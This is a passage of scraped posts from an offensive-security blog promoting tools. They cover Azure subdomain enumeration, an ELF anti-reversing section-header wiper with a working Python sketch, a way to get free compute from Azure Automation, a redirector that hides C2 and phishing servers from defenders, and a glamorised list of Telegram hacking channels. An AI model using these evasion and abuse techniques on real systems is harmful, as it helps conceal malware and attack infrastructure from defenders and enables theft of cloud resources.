Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.</p> <br /><span style="font-size: large;"><b>Contribution</b></span><br /> <p>Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.</p> <br /><span style="font-size: large;"><b>About the Author</b></span><br /> <p>SwaggerSpy is developed and maintained by <em>Alisson Moretto</em> (UndeadSec)</p> <p>I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.</p> <br /><span style="font-size: large;"><b>TODO</b></span><br /> <br /><b>Regular Expressions Enhancement</b><br /> <ul> <li>[ ] Review and improve existing regular expressions.</li> <li>[ ] Ensure that regular expressions adhere to best practices.</li> <li>[ ] Check for any potential optimizations in the regex patterns.</li> <li>[ ] Test regular expressions with various input scenarios for accuracy.</li> <li>[ ] Document any complex or non-trivial regex patterns for better understanding.</li> <li>[ ] Explore opportunities to modularize or break down complex patterns.</li> <li>[ ] Verify the regular expressions against the latest specifications or requirements.</li> <li>[ ] Update documentation to reflect any changes made to the regular expressions.</li> </ul> <br /><span style="font-size: large;"><b>License</b></span><br /> <p>SwaggerSpy is licensed under the MIT License. 
See the <a href="https://github.com/UndeadSec/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p> <br /><b>Thanks</b><br /> <p>Special thanks to <a href="https://github.com/Liodeus" rel="nofollow" target="_blank" title="@Liodeus">@Liodeus</a> for providing project inspiration through <a href="https://github.com/Liodeus/swaggerHole" rel="nofollow" target="_blank" title="swaggerHole">swaggerHole</a>.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/UndeadSec/SwaggerSpy" rel="nofollow" target="_blank" title="Download SwaggerSpy">Download SwaggerSpy</a></span></b></div></div></article>
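<p>The regex-based inspection described above is straightforward to sketch. The patterns below are illustrative stand-ins, not SwaggerSpy's actual rules (those live in the project's source):</p>

```python
import re

# Illustrative patterns only -- SwaggerSpy's real regexes live in its repository.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "generic_api_key": re.compile(r"(?i)api[_-]?key['\"]?\s*[:=]\s*['\"]([A-Za-z0-9_\-]{16,})"),
}

def scan_document(text):
    """Return (pattern_name, matched_text) pairs found in one API document."""
    findings = []
    for name, pattern in SECRET_PATTERNS.items():
        for match in pattern.finditer(text):
            findings.append((name, match.group(0)))
    return findings

doc = '{"description": "demo", "amazonKey": "AKIAIOSFODNN7EXAMPLE"}'
print(scan_document(doc))  # [('aws_access_key_id', 'AKIAIOSFODNN7EXAMPLE')]
```

<p>In practice the same scan would be run over every Swagger/OpenAPI document returned by a SwaggerHub search, with the findings aggregated into the report.</p>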
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-69817349911366898972024-02-18T17:11:00.000-08:002024-02-18T17:12:30.018-08:00Navigating Telegram’s Underworld: A Cipher for the Elite Hackers<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzd_vbpxHl8r4YdtQEpO8PIn96hwz_UtXrzq64oeAgfrnL6aomAX6FTNw16jNNsO2h9xMN2S5X_Cd4Qk2fHP5SdwOICY3UMeZG9kbG_CrvSOyfYAxlYeZb7CQwrpHbgr0oxRwrvGu7mqhtdFSZfAUntN5DCkCbs3dhXWwLLD16AwiBYqtgpHixFen8lkU/s1024/DALL%C2%B7E%202024-02-18%2022.07.43%20-%20A%20visually%20striking%20and%20complex%20image%20representing%20the%20digital%20underworld%20of%20Telegram,%20where%20encrypted%20channels%20hide%20beneath%20layers%20of%20cybersecurity%20a.webp" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1024" height="466" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzd_vbpxHl8r4YdtQEpO8PIn96hwz_UtXrzq64oeAgfrnL6aomAX6FTNw16jNNsO2h9xMN2S5X_Cd4Qk2fHP5SdwOICY3UMeZG9kbG_CrvSOyfYAxlYeZb7CQwrpHbgr0oxRwrvGu7mqhtdFSZfAUntN5DCkCbs3dhXWwLLD16AwiBYqtgpHixFen8lkU/w466-h466/DALL%C2%B7E%202024-02-18%2022.07.43%20-%20A%20visually%20striking%20and%20complex%20image%20representing%20the%20digital%20underworld%20of%20Telegram,%20where%20encrypted%20channels%20hide%20beneath%20layers%20of%20cybersecurity%20a.webp" width="466" /></a></div><br /><div data-target="react-app.reactRoot"><br /></div><div data-target="react-app.reactRoot"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;">In the encrypted depths of Telegram, far beyond the scrutiny of average netizens, lies a network pulsating with the lifeblood of the hacking elite. This isn’t your run-of-the-mill tutorial or a hacker’s 101 guide. 
This post is a deep dive into the abyss, mapping the veins of active and dormant channels that are the backbone of cyber threat intelligence and underground hacking operations.</div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;">The channels we’re dissecting today are not just communication lines; they are the hidden layers of the onion, each peel revealing more about the dark arts of digital dominance. From active dens where real-time data breaches, exploit trades, and botnet controls unfold, to the ghostly silence of channels once alive with the chatter of codes and hacks now lying dormant or expired - every link, every channel, serves as a node in the vast neural network of the global hacking community.</div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;"><b>Active Channels: The Frontlines</b></div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;">Here, in the buzzing hive of active channels, you're as likely to find a zero-day exploit as you are a discussion on the latest evasion techniques. This isn't just about sharing tools or data; it's a relentless innovation race. 
Techniques, scripts, and methodologies discussed here are not for the faint-hearted but for those who command the terminal like it’s an extension of their mind.</div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;"><b>Dormant/Expired Channels: The Archives</b></div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;">The silent corridors of expired channels are not just digital tombs; they are treasure troves of past operations, a testament to the ephemeral nature of digital power. Each one holds lessons, failures, and victories. They are the archives for those willing to learn from history to master the future.</div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: center;"><span style="font-size: x-large;"><b><a href="https://github.com/fastfire/deepdarkCTI/blob/main/telegram.md" target="_blank">Access The Repository</a></b></span></div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-31886191924766651142024-02-18T16:08:00.000-08:002024-02-18T16:08:10.698-08:00AzSubEnum - Azure Service Subdomain Enumeration<article><div class="post-body entry-content" id="post-body-8949972734601761999" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiUC0NcIsSKLyaQqCb7HePNPtPEi9hfi1wQRgruyAHdqBuUDeY84kPZQLL7QNLfresznEv7lH5eUajY1aOnnEAVVfZ0fuxpCcPsS9gPz0TwLUOlur-f32W65Bj_dLCh2WlIsDQiXKYJW3EacuftlPhr_NpY-HsdZlHjTyiYrdS-XPgQG1HHvD3zaUP8yS5X"><img alt="" 
border="0" height="374" id="BLOGGER_PHOTO_ID_7336838042181186818" src="https://blogger.googleusercontent.com/img/a/AVvXsEiUC0NcIsSKLyaQqCb7HePNPtPEi9hfi1wQRgruyAHdqBuUDeY84kPZQLL7QNLfresznEv7lH5eUajY1aOnnEAVVfZ0fuxpCcPsS9gPz0TwLUOlur-f32W65Bj_dLCh2WlIsDQiXKYJW3EacuftlPhr_NpY-HsdZlHjTyiYrdS-XPgQG1HHvD3zaUP8yS5X=w640-h374" width="640" /></a></p><br /><p>AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.</p> <span><a name="more"></a></span><div><br /></div><span style="font-size: large;"><b>How it works?</b></span><br /> <p>AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. 
Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.</p> <p>With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.</p> <br /><span style="font-size: large;"><b>Why I created this</b></span><br /> <p>During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, <a href="https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureSubDomains.ps1" rel="nofollow" target="_blank" title="Invoke-EnumerateAzureSubDomains">Invoke-EnumerateAzureSubDomains</a> from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <pre><code>➜ AzSubEnum git:(main) ✗ python3 azsubenum.py --help<br />usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]<br /><br />Azure Subdomain Enumeration<br /><br />options:<br /> -h, --help show this help message and exit<br /> -b BASE, --base BASE Base name to use<br /> -v, --verbose Show verbose output<br /> -t THREADS, --threads THREADS<br /> Number of threads for concurrent execution<br /> -p PERMUTATIONS, --permutations PERMUTATIONS<br /> File containing permutations<br /></code></pre> <p>Basic enumeration:</p> <pre><code>python3 azsubenum.py -b retailcorp --threads 10<br /></code></pre> <p>Using permutation wordlists:</p> <pre><code>python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt<br /></code></pre> <p>With verbose output:</p> <pre><code>python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt --verbose<br /></code></pre> <p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" 
href="https://github.com/yuyudhn/AzSubEnum" rel="nofollow" target="_blank" title="Download AzSubEnum">Download AzSubEnum</a></span></b></div></div></article>
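<p>The permutation-plus-DNS-resolution approach described above can be sketched in a few lines. The service suffixes here are a small illustrative subset; AzSubEnum's full service-to-domain mapping is in its source:</p>

```python
import socket

# A small illustrative subset of Azure service suffixes; AzSubEnum's full
# service-to-domain mapping lives in its source.
AZURE_SUFFIXES = [
    "azurewebsites.net",       # App Services
    "blob.core.windows.net",   # Storage accounts
    "database.windows.net",    # MSSQL
    "vault.azure.net",         # Key Vault
]

def candidates(base, permutations=()):
    """Combine the base name with permutation words and service suffixes."""
    names = [base]
    for word in permutations:
        names += [f"{base}-{word}", f"{word}-{base}", f"{base}{word}"]
    return [f"{name}.{suffix}" for name in names for suffix in AZURE_SUFFIXES]

def resolves(hostname):
    """A subdomain 'exists' if its name resolves in DNS."""
    try:
        socket.gethostbyname(hostname)
        return True
    except OSError:
        return False

for host in candidates("retailcorp", ["dev"]):
    if resolves(host):
        print("[+]", host)
```

<p>The real tool runs these lookups across a thread pool (the <code>--threads</code> option) since candidate lists grow quickly once a permutation wordlist is supplied.</p>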
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-67168210944420962422024-02-18T16:06:00.000-08:002024-02-18T16:06:34.020-08:00NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes<article><div class="post-body entry-content" id="post-body-8731917678747533080" itemprop="articleBody"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhOTpJv7-KVVhhI8i0Ka61tLH1jQmZbF4zB4-O2sYWafDM74FBiF3UW289PuT2xuN4xOq1kDI3FvzuRfkNq6o_JGMVPdVJCEFhK5jgSZUGsDCiTtWsNTF1QLgHO_lF3afyBXA4_smk-08-xpGybJcSCeEPzzimS4UY2cs9IDqId2lUgEctiEUCJ6RalV5k/s1396/NullSection.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="776" data-original-width="1396" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhOTpJv7-KVVhhI8i0Ka61tLH1jQmZbF4zB4-O2sYWafDM74FBiF3UW289PuT2xuN4xOq1kDI3FvzuRfkNq6o_JGMVPdVJCEFhK5jgSZUGsDCiTtWsNTF1QLgHO_lF3afyBXA4_smk-08-xpGybJcSCeEPzzimS4UY2cs9IDqId2lUgEctiEUCJ6RalV5k/w640-h356/NullSection.png" width="640" /></a></div><p><br /></p> <p>NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes.</p> <span><a name="more"></a></span><div><br /></div><span style="font-size: large;"><b>Install</b></span><br /> <pre><code>git clone https://github.com/MatheuZSecurity/NullSection<br />cd NullSection<br />gcc nullsection.c -o nullsection<br />./nullsection<br /></code></pre> <br /><span style="font-size: large;"><b>Advantage</b></span><br /> <p>When you run nullsection on any ELF binary (it could be a .ko rootkit), and then open the file in Ghidra or IDA, nothing will appear: there are no functions to parse in the decompiler. Even if you run <code>readelf -S /path/to/elf</code>, the following message will appear: "There are no sections in this file."</p> <p>Make good use of the tool!</p> <br /><b>Note</b><br /> <pre><code>We are not responsible for any damage caused by this tool. Use the tool intelligently and for educational purposes only.</code></pre><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/MatheuZSecurity/NullSection" rel="nofollow" target="_blank" title="Download NullSection">Download NullSection</a></span></b></div></div></article>
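<p>The underlying trick is simple: readelf and most disassemblers locate sections through the ELF header fields <code>e_shoff</code>, <code>e_shentsize</code>, <code>e_shnum</code> and <code>e_shstrndx</code>, so zeroing them makes the section header table unreachable. NullSection itself is written in C and its exact implementation may differ; here is a minimal Python sketch of the idea for 64-bit ELFs:</p>

```python
def null_sections(path):
    """Zero the ELF64 header fields that locate the section header table:
    e_shoff (offset 0x28, 8 bytes) and e_shentsize/e_shnum/e_shstrndx
    (offsets 0x3A-0x3F). With e_shnum == 0, `readelf -S` reports
    "There are no sections in this file."
    """
    with open(path, "r+b") as f:
        data = bytearray(f.read())
        if data[:4] != b"\x7fELF" or data[4] != 2:
            raise ValueError("expected a 64-bit ELF file")
        data[0x28:0x30] = b"\x00" * 8   # e_shoff: file offset of section headers
        data[0x3A:0x40] = b"\x00" * 6   # e_shentsize, e_shnum, e_shstrndx
        f.seek(0)
        f.write(data)

# Usage: null_sections("/path/to/elf")
```

<p>Program execution is unaffected because the loader only uses the program headers; only section-based tooling is blinded.</p>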
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-42303710836718850022024-02-18T16:04:00.000-08:002024-02-18T16:04:09.991-08:00WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications<article><div class="post-body entry-content" id="post-body-488382308568355329" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjHila5XtGJjXxNC5MVtZIFF5UmYs0l6WIH_FEP_0Za6LItMU_uZuhOUXjawIWEl6r3s8G_6lwp0sNSh7UQCY6gIuKshFKd04JSG7qDF0lSzmhDOp6kEAHq6icYyca2A8AaCIC0LOrbV9mcytzwDxy-LK05leKKuM1-qDfhlz6LHkejm8qIATlhleBNcfuw"><img alt="" border="0" height="308" id="BLOGGER_PHOTO_ID_7335339800282448578" src="https://blogger.googleusercontent.com/img/a/AVvXsEjHila5XtGJjXxNC5MVtZIFF5UmYs0l6WIH_FEP_0Za6LItMU_uZuhOUXjawIWEl6r3s8G_6lwp0sNSh7UQCY6gIuKshFKd04JSG7qDF0lSzmhDOp6kEAHq6icYyca2A8AaCIC0LOrbV9mcytzwDxy-LK05leKKuM1-qDfhlz6LHkejm8qIATlhleBNcfuw=w640-h308" width="640" /></a></p><p><br /></p> <p>WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.</p> <span><a name="more"></a></span><div><br /></div><span style="font-size: large;"><b>Done</b></span><br /> <ul> <li>[x] Scan Static Files.</li> <li>[ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.) 
</li> <li>[ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.</li> </ul> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <br /><b>From Git</b><br /> <pre><code>git clone https://github.com/OsmanKandemir/web-wordlist-generator.git<br />cd web-wordlist-generator && pip3 install -r requirements.txt<br />python3 generator.py -d target-web.com<br /></code></pre> <br /><b>From Dockerfile</b><br /> <p>You can run this application in a container after building the Dockerfile.</p> <pre><code>docker build -t webwordlistgenerator .<br />docker run webwordlistgenerator -d target-web.com -o<br /></code></pre> <br /><b>From DockerHub</b><br /> <p>You can run this application in a container after pulling the image from DockerHub.</p> <pre><code>docker pull osmankandemir/webwordlistgenerator:v1.0<br />docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <pre><code>-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com<br />-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080<br />-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'<br />-o PRINT, --print PRINT Use Print outputs on terminal screen.<br /><br /></code></pre><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/OsmanKandemir/web-wordlist-generator" rel="nofollow" target="_blank" title="Download Web-Wordlist-Generator">Download Web-Wordlist-Generator</a></span></b></div></div></article>
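<p>The static-scan idea boils down to fetching pages and harvesting identifier-like tokens (ids, classes, paths, visible text) into a wordlist. This is an illustrative sketch, not the tool's actual implementation:</p>

```python
import re
from urllib.request import urlopen

def extract_words(page_text, min_len=4):
    """Harvest identifier-like tokens from raw HTML into a deduplicated wordlist."""
    tokens = re.findall(r"[A-Za-z][A-Za-z0-9_-]{%d,}" % (min_len - 1), page_text)
    return sorted({t.lower() for t in tokens})

def wordlist_from_url(url):
    html = urlopen(url, timeout=10).read().decode("utf-8", errors="replace")
    return extract_words(html)

# Usage (network required):
# print("\n".join(wordlist_from_url("https://target-web.com")))
```

<p>A wordlist built from the target's own markup tends to hit far more hidden paths and parameters than a generic one, which is the point of generating it per application.</p>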
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-49252171748978098142024-02-18T16:02:00.000-08:002024-02-18T16:02:25.952-08:00CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged<article><div class="post-body entry-content" id="post-body-9171197228075669367" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhS6Zeh0JwcBNfQfyOQaJpItsi9HwkMfvaATzYYxE94kT7oT1sJR1SVV9r3KbnLf7VtP5V7F4fys4cikCRwuSS1Ro0Q6rCShZ20wt2KCEfmfvVP1jpOS2EduMUQVFKEOd8MpE8BKevqrgnHfL75W9X5zLPgiME50e3-c9zUlAwSfWNxE7_vnpczraVLgUat"><img alt="" border="0" height="326" id="BLOGGER_PHOTO_ID_7317786885148999122" src="https://blogger.googleusercontent.com/img/a/AVvXsEhS6Zeh0JwcBNfQfyOQaJpItsi9HwkMfvaATzYYxE94kT7oT1sJR1SVV9r3KbnLf7VtP5V7F4fys4cikCRwuSS1Ro0Q6rCShZ20wt2KCEfmfvVP1jpOS2EduMUQVFKEOd8MpE8BKevqrgnHfL75W9X5zLPgiME50e3-c9zUlAwSfWNxE7_vnpczraVLgUat=w640-h326" width="640" /></a></p><p><br /></p> <p dir="auto">Execute code within Azure Automation service without getting charged</p> <h2 dir="auto" tabindex="-1">Description</h2> <p dir="auto">CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.</p> <ul dir="auto"> <li> <p dir="auto">This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". 
As of 3/9/23, this tool can still be used without getting charged.</p> </li> <li> <p dir="auto">Each execution is limited to 3 hours</p> </li> </ul><span><a name="more"></a></span><div><br /></div> <h2 dir="auto" tabindex="-1">Requirements</h2> <ol dir="auto"> <li>Python 3.8+ with the libraries mentioned in the file <code>requirements.txt</code></li> <li>Configured Azure CLI - <a href="https://learn.microsoft.com/en-us/cli/azure/install-azure-cli" rel="nofollow" target="_blank" title="https://learn.microsoft.com/en-us/cli/azure/install-azure-cli">https://learn.microsoft.com/en-us/cli/azure/install-azure-cli</a> <ul dir="auto"> <li>Account must be logged in before using this tool</li> </ul> </li> </ol> <h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto"><code>pip install .</code></p> <h2 dir="auto" tabindex="-1">Usage</h2> <div><pre><code>usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]<br /><br />CloudMiner - Free computing power in Azure Automation Service<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> --path PATH the script path (Powershell or Python)<br /> --id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a<br /> utomationAccounts/{automationAccountName}<br /> -c COUNT, --count COUNT<br /> number of executions<br /> -t TOKEN, --token TOKEN<br /> Azure access token (optional). 
If not provided, token will be retrieved using the Azure CLI<br /> -r REQUIREMENTS, --requirements REQUIREMENTS<br /> Path to requirements file to be installed and use by the script (relevant to Python scripts only)<br /> -v, --verbose Enable verbose mode<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Example usage</h2> <h3 dir="auto" tabindex="-1">Python</h3> <p dir="auto" style="text-align: center;"><a href="https://github.com/SafeBreach-Labs/CloudMiner/blob/main/images/cloud-miner-usage-python.png?raw=true" rel="nofollow" target="_blank" title="Execute code using Azure Automation service without getting charged (6)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhS6Zeh0JwcBNfQfyOQaJpItsi9HwkMfvaATzYYxE94kT7oT1sJR1SVV9r3KbnLf7VtP5V7F4fys4cikCRwuSS1Ro0Q6rCShZ20wt2KCEfmfvVP1jpOS2EduMUQVFKEOd8MpE8BKevqrgnHfL75W9X5zLPgiME50e3-c9zUlAwSfWNxE7_vnpczraVLgUat"><img alt="" border="0" height="326" id="BLOGGER_PHOTO_ID_7317786885148999122" src="https://blogger.googleusercontent.com/img/a/AVvXsEhS6Zeh0JwcBNfQfyOQaJpItsi9HwkMfvaATzYYxE94kT7oT1sJR1SVV9r3KbnLf7VtP5V7F4fys4cikCRwuSS1Ro0Q6rCShZ20wt2KCEfmfvVP1jpOS2EduMUQVFKEOd8MpE8BKevqrgnHfL75W9X5zLPgiME50e3-c9zUlAwSfWNxE7_vnpczraVLgUat=w640-h326" width="640" /></a></p> <h3 dir="auto" tabindex="-1">Powershell</h3> <p dir="auto" style="text-align: center;"><a href="https://github.com/SafeBreach-Labs/CloudMiner/blob/main/images/cloud-miner-usage-powershell.png?raw=true" rel="nofollow" target="_blank" title="Execute code using Azure Automation service without getting charged (7)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhIFUv_pQm5omoivDvUdeNvnfuxKKfIEwNQ-Ba8dWMpW-FS2oMJa5izRiBDr_GBC_8cZnmBKuAVtVna_yaLT2mgv94omiefRuIkP0v8hAl433LeGfc40-qr1P27h3zbgZBRoJWMHeT3QroFFDaABtprt_1iEdPoB0q3xHTTo0uzhz27XMAKu_qZRj9Nm1YO"><img alt="" border="0" height="268" id="BLOGGER_PHOTO_ID_7317786901488172306" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEhIFUv_pQm5omoivDvUdeNvnfuxKKfIEwNQ-Ba8dWMpW-FS2oMJa5izRiBDr_GBC_8cZnmBKuAVtVna_yaLT2mgv94omiefRuIkP0v8hAl433LeGfc40-qr1P27h3zbgZBRoJWMHeT3QroFFDaABtprt_1iEdPoB0q3xHTTo0uzhz27XMAKu_qZRj9Nm1YO=w640-h268" width="640" /></a></p> <h2 dir="auto" tabindex="-1">License</h2> <p dir="auto">CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.</p> <h2 dir="auto" tabindex="-1">Author - Ariel Gamrian</h2> <ul dir="auto"> <li>LinkedIn - <a href="https://www.linkedin.com/in/ariel-gamrian/" rel="nofollow" target="_blank" title="Ariel Gamrian">Ariel Gamrian</a></li></ul><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SafeBreach-Labs/CloudMiner" rel="nofollow" target="_blank" title="Download CloudMiner">Download CloudMiner</a></span></b></div></div></article>
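<p>As the help text above notes, when no <code>-t/--token</code> is supplied the tool falls back to the logged-in Azure CLI. That fallback can be sketched as follows (an assumption about the mechanics; CloudMiner's actual code may differ):</p>

```python
import json
import subprocess

def parse_token(cli_output):
    """Extract the bearer token from `az account get-access-token` JSON output."""
    return json.loads(cli_output)["accessToken"]

def get_cli_token():
    """Fallback used when no -t/--token is given: ask the logged-in Azure CLI."""
    result = subprocess.run(
        ["az", "account", "get-access-token", "--output", "json"],
        check=True, capture_output=True, text=True,
    )
    return parse_token(result.stdout)

# Usage (requires a prior `az login`):
# token = get_cli_token()
```

<p>The token is then used to authenticate the module/package upload calls against the Automation Account resource identified by <code>--id</code>.</p>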
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-13333964401757991942024-02-18T16:00:00.000-08:002024-02-18T16:00:25.062-08:00BounceBack - Stealth Redirector For Your Red Team Operation Security<article><div class="post-body entry-content" id="post-body-773064837929871074" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjBaUL8aV4ZLMq0i6D_J7gcRq8WG054dGPRC5bwoR9rzFJEJV5V97PvAjjlox_dIqb0JwXoySa7uRRmN3ab6cJlQm9nHOQJkQ3RbGP6bEo5ZQ07T83UHDd34K_9ZJQxg09EL8Q1_99kFqyqOFZfovBv6M6peusx5kRLhJsOtG8vA6MckAgACNavn7mETpWr"><img alt="" border="0" height="504" id="BLOGGER_PHOTO_ID_7310075473526524002" src="https://blogger.googleusercontent.com/img/a/AVvXsEjBaUL8aV4ZLMq0i6D_J7gcRq8WG054dGPRC5bwoR9rzFJEJV5V97PvAjjlox_dIqb0JwXoySa7uRRmN3ab6cJlQm9nHOQJkQ3RbGP6bEo5ZQ07T83UHDd34K_9ZJQxg09EL8Q1_99kFqyqOFZfovBv6M6peusx5kRLhJsOtG8vA6MckAgACNavn7mETpWr=w640-h504" width="640" /></a></p><p><br /></p> <p dir="auto">BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. 
It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.</p> <p dir="auto">The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.</p> <p dir="auto">For more information on tool usage, you may visit the <a href="https://github.com/D00Movenok/BounceBack/wiki" rel="nofollow" target="_blank" title="project's wiki">project's wiki</a>.</p> <h2 dir="auto" tabindex="-1">Features</h2> <ul dir="auto"> <li>A highly configurable and customizable filter pipeline with boolean-based combination of rules can hide your infrastructure from the keenest blue eyes.</li> <li>Easily extendable project structure: everyone can add rules for their own C2.</li> <li>Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors, combined with an IP filter to prevent them from using/attacking your infrastructure.</li> <li>The Malleable C2 profile parser validates inbound HTTP(s) traffic against the Malleable config and rejects packets that fail validation.</li> <li>Out of the box domain fronting support allows you to hide your infrastructure a little bit more.</li> <li>Ability to check the IPv4 address of a request against IP Geolocation/reverse lookup data and compare it to specified regular expressions to exclude peers connecting from outside allowed companies, nations, cities, domains, etc.</li> <li>All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.</li> <li>Support for multiple proxies with different filter pipelines on one BounceBack instance.</li> <li>Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debugging issues.</li> </ul> <h2 dir="auto" tabindex="-1">Rules</h2> <p dir="auto">BounceBack currently supports the following filters:</p> <ul dir="auto"> <li>Boolean-based (and, or, not) rules 
